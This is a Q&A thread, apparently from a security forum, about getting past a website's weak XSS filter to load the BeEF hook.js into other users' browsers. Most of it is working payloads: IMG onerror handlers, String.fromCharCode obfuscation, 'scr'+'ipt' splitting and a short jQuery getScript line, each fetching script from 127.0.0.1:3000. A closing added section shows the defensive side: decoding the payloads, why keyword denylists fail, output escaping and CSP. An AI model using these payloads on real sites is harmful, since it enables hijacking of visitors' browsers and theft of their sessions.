4

I found a vulnerability on a website which allows me to trigger XSS. It's a very specific vulnerability, which is caused by a design flaw. I want to write a PoC for them, but I'm stuck at this step.

The XSS payload is not delivered through a URL, and is not stored in a database. So it's neither persistent XSS nor reflective XSS. The attacker has to enter the payload into a box and send it to another user of that website by altering a specific ID.

Anyway, my question. They filter XSS, but not well enough, because this payload can bypass their filter:

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

The problem is, how do I use this specific filter to hook BeEF on it? I tried:

<IMG SRC=/ onerror="document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 34, 49, 50, 55, 46, 48, 46, 48, 46, 49, 58, 51, 48, 48, 48, 47, 104, 111, 111, 107, 46, 106, 115, 34, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62))"></img>

But that payload ain't delivered clean, as result I get a lot of other HTML mixed. I also searched if there are already articles explaining how to bypass XSS filters to hook BeEF on it, but I found none.

So my question is: is there a way to bypass XSS filters to be able to hook BeEF on it? I'm not asking how to bypass XSS in general; I'm asking about a situation where you want to include the BeEF hook.js file.

Edit 1: An extra problem: I only have exactly 116 characters to enter in the box. I don't think it's a problem to shorten the JavaScript that much? Also, what I meant with "I got a mix with a lot of HTML" was that when I entered that other long string, the box 'absorbed' a piece of HTML code. Using the window.open() function to open a website containing the hook in a new window or tab or whatever would also be satisfactory.

Edit 2: I found a way of opening a new URL in a new tab by using this code: <img src="/" onerror="window.open('http://127.0.0.1:3000/hook.js', '_blank')"> However, the user gets a warning that a pop-up was blocked, and when he allows it, he gets focus on that tab immediately. Is this sufficient for a PoC? Or does anyone have better solutions?

Anders
  • 64,406
  • 24
  • 178
  • 215
O'Niel
  • 2,740
  • 3
  • 17
  • 28
  • 1
    What technology is doing the XSS filtering? Have you identified what is triggering the filter? What happens if you replace document.write with alert? Also, check https://html5sec.org/ for ideas of other elements you can work with - perhaps XSS filtering is only for some of the HTML tags / parameters. – Dog eat cat world Jul 06 '16 at 14:24

1 Answer

5

Original version

Using document.write in an event handler can cause problems if the event is fired after the page is loaded (i.e. closed), because the browser will then clear the document and start a new blank one. I am not sure I understand what "payload ain't delivered clean, as result I get a lot of other HTML mixed" is supposed to mean, but this might be your problem.

If so, try using this (minus the line breaks and comments) as a payload:

var x = document.createElement(String.fromCharCode(115, 99, 114, 105, 112, 116)); // "script"
x.src = String.fromCharCode(49, 50, 55, 46, 48, 46, 48, 46, 49, 58, 51, 48, 48, 48, 47, 104, 111, 111, 107, 46, 106, 115); // "127.0.0.1:3000/hook.js" - Might not need to be obfuscated?
document.body.appendChild(x);

Based on this answer.

Shorter versions

I will write these with whitespace included for readability, but it can of course be removed. I am assuming that only the word script is filtered, since you used fromCharCode. If more is filtered, you might have to change these a little, but there should be wiggle room.

Alt 1 (94 characters)

y = document;
x = y.createElement("scr" + "ipt");
x.src = "127.0.0.1:3000/hook.js";
y.body.appendChild(x)

If script without < and > is OK, you could gain some characters by removing "+".

Alt 2 (with jQuery, 43 characters)

$["getScr"+"ipt"]("127.0.0.1:3000/hook.js")

Again, if script is OK you can get down to 37 characters:

$.getScript("127.0.0.1:3000/hook.js")

Anders
  • 64,406
  • 24
  • 178
  • 215
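As an added example, not code from the question or from Anders' answer, here is the defender's side of the two things this thread shows: the question's String.fromCharCode payloads hide what is actually being sent from anyone reading logs or tuning a filter, and the answer's "scr"+"ipt" trick shows why a keyword denylist (the answer assumes the site strips the word "script") is not an XSS defence at all, while contextual output encoding is. The function names are hypothetical and the sample strings are constructed from the shapes shown above.

```javascript
// Added example, not code from the question or from Anders' answer. Function
// names are hypothetical; sample strings are constructed from the thread.

// Expand every String.fromCharCode(n, n, ...) call into the string literal it
// produces, so reviewers and detection rules see the decoded payload instead
// of a list of numbers.
function decodeFromCharCode(input) {
  return input.replace(/String\.fromCharCode\(\s*([\d\s,]*)\)/g, (match, list) => {
    const codes = list.split(",").map((s) => s.trim()).filter((s) => s !== "");
    if (codes.length === 0 || codes.some((s) => !/^\d+$/.test(s))) {
      return match; // not a plain list of integers: leave it untouched
    }
    return JSON.stringify(String.fromCharCode(...codes.map(Number)));
  });
}

// A naive denylist of the kind the answer assumes the site uses: it removes
// the word "script" in any case and nothing else.
function naiveDenylistFilter(input) {
  return input.replace(/script/gi, "");
}

// Contextual output encoding for the HTML text context. Once the five
// significant characters are encoded, the browser never sees a tag or an
// attribute boundary, whatever the text contains.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Crude structural check used only for the comparison below: is there still a
// tag carrying an attribute whose name starts with "on" (an inline handler)?
function containsInlineHandler(html) {
  return /<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Constructed samples in the shapes the thread shows.
const samples = {
  plainScriptTag: '<script src="127.0.0.1:3000/hook.js"></script>',
  concatenated: '<img src=/ onerror="x=document.createElement(\'scr\'+\'ipt\')">',
  charCodes: '<img src=/ onerror="alert(String.fromCharCode(88,83,83))">',
};

// Run one sample through both defences and report whether an inline handler
// survives each of them.
function compareDefences(sample) {
  const denylisted = naiveDenylistFilter(sample);
  const escaped = escapeHtml(sample);
  return {
    denylisted,
    denylistStillExecutable: containsInlineHandler(denylisted),
    escaped,
    escapedStillExecutable: containsInlineHandler(escaped),
  };
}

for (const [name, sample] of Object.entries(samples)) {
  console.log(name, decodeFromCharCode(sample), compareDefences(sample));
}
```

The denylist only catches the literal `<script>` tag; the concatenated and char-code forms pass through untouched and still carry a working `onerror` handler, whereas every escaped sample is inert because no `<` survives. On the application side, a Content-Security-Policy with a `script-src` directive that omits `'unsafe-inline'` would additionally block inline event handlers, and a source list that does not include the external host would block the script load, so the fix is encoding plus CSP, not a longer word list.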